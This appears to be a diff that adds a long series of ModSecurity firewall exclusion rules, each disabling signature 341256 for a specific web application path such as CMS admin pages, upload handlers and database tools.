+SecRule REQUEST_FILENAME "/banner-edit\.php" "phase:2,id:94646,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content-edit\.php" "phase:2,id:94647,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/paymentrecall\.php" "phase:2,id:94648,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/hostmeinadmin/clientshosting\.php" "phase:2,id:94649,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/processwire/page/edit" "phase:2,id:94650,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/general_settings\.php" "phase:2,id:94651,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adclick\.php" "phase:2,id:94652,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_edit_cat\.php" "phase:2,id:94653,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:94654,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kontaktformular_web-plaaning\.php" "phase:2,id:94655,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/web-planning\.php" "phase:2,id:94656,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shop/remote\.php" "phase:2,id:94657,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/beta_add_record\.php" "phase:2,id:94658,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/echeck_receipt\.php" "phase:2,id:94659,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/send\.php" "phase:2,id:94660,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tweets-grab-ldn\.php" "phase:2,id:94661,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/receipt\.php" "phase:2,id:94662,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/contenu/modif/" "phase:2,id:94663,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/processproperty\.php" "phase:2,id:94664,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/newsletter/envoi\.php" "phase:2,id:94665,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extplorer/index\.php" "phase:2,id:94666,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/functions/update_article\.ph" "phase:2,id:94667,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/functions/client\.php" "phase:2,id:94668,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/op\.php" "phase:2,id:94669,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod_raxo_allmode/tools/tb\.php" "phase:2,id:94670,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_offer\.php" "phase:2,id:94671,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/foto-graveren\.php" "phase:2,id:94672,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/beta_new_update\.php" "phase:2,id:94673,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webdav\.php" "phase:2,id:94674,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sassistant/monitoring\.php" "phase:2,id:94675,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/printdeexpediat\.php" "phase:2,id:94676,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shop/presta_admin/index\.php" "phase:2,id:94677,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adduserplugin\.php" "phase:2,id:94678,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edithtmlblob\.php" "phase:2,id:94679,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/video_admin/editvideo/" "phase:2,id:94680,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/functions/update_article\.php" "phase:2,id:94681,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/catalog/admbre/categories\.php" "phase:2,id:94682,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:94683,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-edit\.php" "phase:2,id:94684,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/producto\.php" "phase:2,id:94685,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/service/psnabe/clientsservices\.php" "phase:2,id:94686,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/options-permalink\.php" "phase:2,id:94687,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ga\.php" "phase:2,id:94688,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/server_databases\.php" "phase:2,id:94689,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:94690,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:94691,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/support/agent/index\.php" "phase:2,id:94692,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/web-services/emailme\.php" "phase:2,id:94693,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/we_cmd\.php" "phase:2,id:94694,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage_news\.php" "phase:2,id:94695,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addersivu\.php" "phase:2,id:94696,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/vqgen/" "phase:2,id:94697,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/hallinta/kirjailija\.php" "phase:2,id:94698,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/json-api/cpanel" "phase:2,id:94699,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:94700,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "extplorer/index\.php" "phase:2,id:94701,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/themes/oakland/theme/functions/upload\.php" "phase:2,id:94702,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/vbshout\.php" "phase:2,id:94703,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/property\.php" "phase:2,id:94704,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/theme/functions/upload\.php" "phase:2,id:94705,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/showimage\.php\.jpg" "phase:2,id:94706,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/admin/index\.php" "phase:2,id:94707,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/link_list\.js\.php" "phase:2,id:94708,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:94709,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/send\.pl" "phase:2,id:94710,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send_mail_with_attachment\.php" "phase:2,id:94711,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ts_manage\.php" "phase:2,id:94712,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/eqdkp_uploader/dialog\.php" "phase:2,id:94713,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/eqdkp_lightbox/dialog\.php" "phase:2,id:94714,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addeditproperties\.php" "phase:2,id:94715,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/muokkaa_suomi\.php" "phase:2,id:94716,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/setpage\.php" "phase:2,id:94717,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quick_updates\.php" "phase:2,id:94718,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/custom404css\.php" "phase:2,id:94719,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extra_info_pages\.php" "phase:2,id:94720,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit-tags\.php" "phase:2,id:94721,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/qrcode/img\.php" "phase:2,id:94722,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/randomimage\.php" "phase:2,id:94723,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/user\.php" "phase:2,id:94724,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save_page_settings\.php" "phase:2,id:94725,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/changedata\.php" "phase:2,id:94726,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cadmin/index\.php" "phase:2,id:94727,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magento/index\.php/banner" "phase:2,id:94728,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/factor_edit\.php" "phase:2,id:94729,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/options/editpl\.php" "phase:2,id:94730,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload/scripts/ajax\.sfsyncphotos\.php" "phase:2,id:94731,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adminepharmac\.php" "phase:2,id:94732,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/siteadmin/leafs/addinline" "phase:2,id:94733,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dmxeditor/dialogs/upload\.php" "phase:2,id:94734,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/system/phpimageeditor/index\.php" "phase:2,id:94735,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/galeria/thumbs\.php" "phase:2,id:94736,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/prize_posting\.php" "phase:2,id:94737,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clientservices\.php" "phase:2,id:94738,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_save_name\.php" "phase:2,id:94739,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ckeditor/xss" "phase:2,id:94740,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/muuta\.php" "phase:2,id:94741,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:94742,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/envoi-code\.html" "phase:2,id:94743,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiki-edit_css\.php" "phase:2,id:94744,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/index\.cfm" "phase:2,id:94745,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e107_plugins/sgallery/showpic\.php" "phase:2,id:94746,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_rar_radio/tmpl/player/player\.php" "phase:2,id:94747,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editpackage\.php" "phase:2,id:94748,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/systeembeheer/mysql" "phase:2,id:94749,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/view_system_style_source\.php" "phase:2,id:94750,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/autorisierung\.php" "phase:2,id:94751,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/updatetemp\.html" "phase:2,id:94752,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_zoej\.php" "phase:2,id:94753,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content/item/edit/" "phase:2,id:94754,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/helpdesk/ajax\.cgi" "phase:2,id:94755,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_image_thumbnail\.php" "phase:2,id:94756,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_delete_file\.php" "phase:2,id:94757,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tools/reacties\.php" "phase:2,id:94758,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administration/basic_settings\.php" "phase:2,id:94759,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fdlhq/admin/config\.php" "phase:2,id:94760,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:94761,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sysext/tstemplate/" "phase:2,id:94762,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dbadmin/" "phase:2,id:94763,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_structure\.php" "phase:2,id:94764,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagens\.php" "phase:2,id:94765,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app_dev\.php" "phase:2,id:94766,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/generator/index\.php" "phase:2,id:94767,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:94768,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcode/" "phase:2,id:94769,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/thememail\.php" "phase:2,id:94770,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/themechooser\.php" "phase:2,id:94771,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thumbopen\.php" "phase:2,id:94772,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sendmessage\.php" "phase:2,id:94773,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-themes-editor\.php" "phase:2,id:94774,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kangooadmin/index\.php" "phase:2,id:94775,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:94776,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/backmin/index\.php" "phase:2,id:94777,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livechat/ajax/footprints\.php" "phase:2,id:94778,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3conf/" "phase:2,id:94779,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ntunnel_mysql\.php" "phase:2,id:94780,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magmi_saveprofile\.php" "phase:2,id:94781,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magmi_saveconfig\.php" "phase:2,id:94782,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/details\.php" "phase:2,id:94783,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/detail_ispravak\.php" "phase:2,id:94784,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/page/addedit\.php" "phase:2,id:94785,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/booking_apartman_podaci\.php" "phase:2,id:94786,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sfpadmin\.php" "phase:2,id:94787,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/iwp/ajax\.php" "phase:2,id:94788,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup/config\.php" "phase:2,id:94789,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ziegenproblem\.php" "phase:2,id:94790,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/image\.php" "phase:2,id:94791,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/unesi\.komentar\.inc\.php" "phase:2,id:94792,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiki-auto_save\.php" "phase:2,id:94793,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/querywindow\.php" "phase:2,id:94794,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/static_content_editresult_mobile\.php" "phase:2,id:94795,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/form/configuration\.php" "phase:2,id:94796,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/site_checker\.php" "phase:2,id:94797,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ins_upd_data\.php" "phase:2,id:94798,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajaxfilemanager\.php" "phase:2,id:94799,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:94800,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/assets/inc/bin/general\.services\.php" "phase:2,id:94801,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_image_editor\.php" "phase:2,id:94802,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/beheer/toolboxx\.php" "phase:2,id:94803,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aktualnolight_elementi\.php" "phase:2,id:94804,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/counterize/counterize\.php" "phase:2,id:94805,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/v6_pages_engine\.php" "phase:2,id:94806,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/v7_pages_engine\.php" "phase:2,id:94807,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wwwsqldesigner/" "phase:2,id:94808,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bottom\.php" "phase:2,id:94809,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clients/admin/addonmodules\.php" "phase:2,id:94810,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/graps-cms\.php" "phase:2,id:94811,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sadrzajdrag_elementi\.php" "phase:2,id:94812,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/listaproperty\.php" "phase:2,id:94813,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plazadmin\.php" "phase:2,id:94814,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filtteri" "phase:2,id:94815,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/jrscgi/update\.cgi" "phase:2,id:94816,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:94817,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/user-edit\.php" "phase:2,id:94818,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/options-website\.php" "phase:2,id:94819,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/savefile\.html" "phase:2,id:94820,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/database/cashtrack\.php" "phase:2,id:94821,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/winkelmodule/naardab\.php" "phase:2,id:94822,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
